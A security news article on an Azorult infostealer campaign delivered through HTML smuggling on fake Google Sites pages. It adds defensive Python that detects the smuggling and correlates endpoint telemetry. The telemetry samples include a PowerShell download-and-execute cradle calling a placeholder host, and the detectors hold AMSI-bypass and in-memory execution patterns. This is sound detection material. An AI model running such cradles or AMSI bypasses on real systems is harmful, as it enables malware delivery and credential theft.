Thursday, January 30, 2025

Azorult Malware Abuses Google Sites To Steal Login Credentials


A new evasive Azorult campaign uses HTML smuggling to deliver a malicious JSON payload from an external website. 

The JSON file is then loaded using reflective code loading, a fileless technique that bypasses disk-based detection; the chain also employs an AMSI bypass to avoid being flagged by antivirus software. 

The sophisticated campaign targets the healthcare industry and steals sensitive information, including login credentials, crypto wallet data, and browser information.  

Google Sites Exploited For HTML Smuggling Attacks 

Adversaries launched an attack using HTML smuggling within fake Google Docs pages on Google Sites, which tricked victims into downloading a malicious payload disguised as a legitimate Google Doc, Netskope said.

Unlike typical HTML smuggling, where the payload resides in the page's JavaScript, this instance embedded the base64-encoded payload within a separate JSON file hosted on a different domain. 

Upon visiting the website, the victim’s browser unknowingly downloads the JSON and extracts the malicious payload. 
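A static triage heuristic for the JSON-hosted smuggling variant described above, written for this article as an added example (not Netskope's tooling). It pulls the inline scripts out of a page, looks for the fetch/decode/Blob/download pattern, and flags fetches to an origin other than the page's own; the sample pages, the `example.invalid` host and the scoring threshold are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed heuristics for the smuggling pattern: fetch a cross-origin JSON,
# base64-decode it in the browser, wrap it in a Blob and force a download.
INDICATORS = [
    ("cross_origin_fetch", re.compile(r"fetch\(\s*['\"]https?://", re.I)),
    ("json_parse", re.compile(r"\.json\(\)|JSON\.parse\(", re.I)),
    ("base64_decode", re.compile(r"\batob\(|Uint8Array\.from\(", re.I)),
    ("blob_build", re.compile(r"new\s+Blob\(", re.I)),
    ("forced_download", re.compile(r"createObjectURL\(|\.download\s*=|msSaveOrOpenBlob", re.I)),
]

def origin_of(url):
    """scheme://host[:port] of a URL, lower-cased, for same-origin comparison."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()

def analyze_html(html, page_origin):
    """Return matched indicators, foreign fetch targets and a verdict for one page."""
    scripts = re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)
    body = "\n".join(scripts)
    hits = [name for name, rx in INDICATORS if rx.search(body)]
    fetched = re.findall(r"fetch\(\s*['\"](https?://[^'\"]+)", body, re.I)
    foreign = [u for u in fetched if origin_of(u) != origin_of(page_origin)]
    score = len(hits) + (1 if foreign else 0)
    return {"indicators": hits, "foreign_fetch": foreign, "suspicious": score >= 4}

# Constructed sample: a fake "Google Doc" page whose script pulls a JSON from
# another host and turns a field of it into a downloaded file (fragments only).
SAMPLE_SMUGGLING = """<html><head><title>Document - Google Docs</title></head>
<script>
fetch("https://cdn.example.invalid/doc.json").then(r => r.json()).then(j => {
  /* decode j.payload with atob(...) into a Uint8Array, then */
  const blob = new Blob([bytes]);
  link.href = URL.createObjectURL(blob); link.download = "Document.lnk";
});
</script></html>"""

# Constructed benign page: a same-origin JSON API call and nothing else.
SAMPLE_BENIGN = """<html><script>
fetch("https://sites.google.com/_/api").then(r => r.json()).then(render);
</script></html>"""

if __name__ == "__main__":
    for page in (SAMPLE_SMUGGLING, SAMPLE_BENIGN):
        print(analyze_html(page, "https://sites.google.com"))
```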

An attacker’s website bypasses scanners with a CAPTCHA and delivers HTML that downloads a disguised LNK shortcut. 

The LNK launches a PowerShell script that downloads a base64-encoded payload, decodes it, creates a scheduled task to execute the script, and then deletes it. 

The downloaded JavaScript copies itself, checks for a specific file that triggers self-deletion, and fetches two more PowerShell scripts to execute.  

Attackers leverage reflective code loading to evade detection. They use two PowerShell scripts, agent1.ps1 and agent3.ps1. Agent1.ps1 disables AMSI scanning. 

Agent3.ps1 downloads an Azorult loader and shellcode into memory, allocates memory for them, and uses CreateThread to execute them within the same process. 

The downloaded loader then retrieves another Powershell script, sd2.ps1, which decrypts and executes the Azorult binary stored within itself.  
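The endpoint side of the chain above (LNK-launched PowerShell cradle, scheduled task, AMSI tampering, in-memory execution) is what process-creation and script-block logging can see. The correlation below is an added example written for this article, not detection content from Netskope; the event records, host names and the three-stage alert threshold are constructed, and the field names are assumptions rather than any vendor's schema.

```python
import re

# Constructed sample telemetry modelled on the described chain; not real events.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c IEX([Convert]::FromBase64String("
                "(New-Object Net.WebClient).DownloadString('https://example.invalid/a')))"},
    {"host": "ws01", "type": "process", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /create /tn Update /tr C:\\Users\\Public\\u.js /sc once"},
    {"host": "ws01", "type": "scriptblock",
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') ..."},
    {"host": "ws01", "type": "scriptblock",
     "text": "$mem = VirtualAlloc(...) ; CreateThread(0, 0, $mem, 0, 0, 0)"},
    {"host": "ws02", "type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-Date"},
]

# Each stage is a predicate over one event. Names are constructed labels.
STAGES = {
    "lnk_cradle": lambda e: e["type"] == "process" and e["image"] == "powershell.exe"
        and e["parent"] == "explorer.exe"   # shell launching the LNK target
        and re.search(r"FromBase64String|DownloadString|-w(indowstyle)?\s+hidden",
                      e["cmdline"], re.I),
    "sched_task": lambda e: (e["type"] == "process" and e["image"] == "schtasks.exe"
                             and "/create" in e["cmdline"].lower())
        or (e["type"] == "scriptblock" and "Register-ScheduledTask" in e["text"]),
    "amsi_tamper": lambda e: e["type"] == "scriptblock"
        and re.search(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", e["text"], re.I),
    "inmem_exec": lambda e: e["type"] == "scriptblock"
        and re.search(r"VirtualAlloc", e["text"]) and re.search(r"CreateThread", e["text"]),
}

def correlate(events, min_stages=3):
    """Group stage hits per host; alert when enough distinct stages appear together."""
    per_host = {}
    for e in events:
        hits = per_host.setdefault(e["host"], set())
        for stage, pred in STAGES.items():
            if pred(e):
                hits.add(stage)
    return {h: {"stages": sorted(s), "alert": len(s) >= min_stages}
            for h, s in per_host.items()}

if __name__ == "__main__":
    for host, verdict in correlate(SAMPLE_EVENTS).items():
        print(host, verdict)
```

A single stage on its own (one hidden-window PowerShell, one scheduled task) is common admin noise; the value is in requiring several stages on the same host within a short window.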

Azorult, a .NET infostealer, targets sensitive user data, and after in-memory execution, it steals credentials, browser data, and crypto wallet information, leveraging Curve25519 cryptography to encrypt stolen data for stealthy exfiltration to the C2 server via HTTP. 

It first captures a full-screen screenshot, and then it pilfers browser data (logins, cookies, browsing history) from Chrome and Firefox by copying specific files, and then it hunts for popular crypto wallet extensions on Chrome, Edge, and Firefox and exfiltrates their data if found. 

Sensitive documents (table from the report; column headings only are reproduced here): Target File Extension | File Name Keywords | Unwanted File Extension

Azorult scans the desktop for sensitive files based on extensions and keywords, skipping specific file types while searching. Upon finding a target file, it reads its content and stores it in memory. 

The data is compressed and encrypted using a pre-shared secret before transmission, and the WebRequest class is leveraged to send the encrypted data along with the public key over HTTPS to the attacker’s command and control server. 
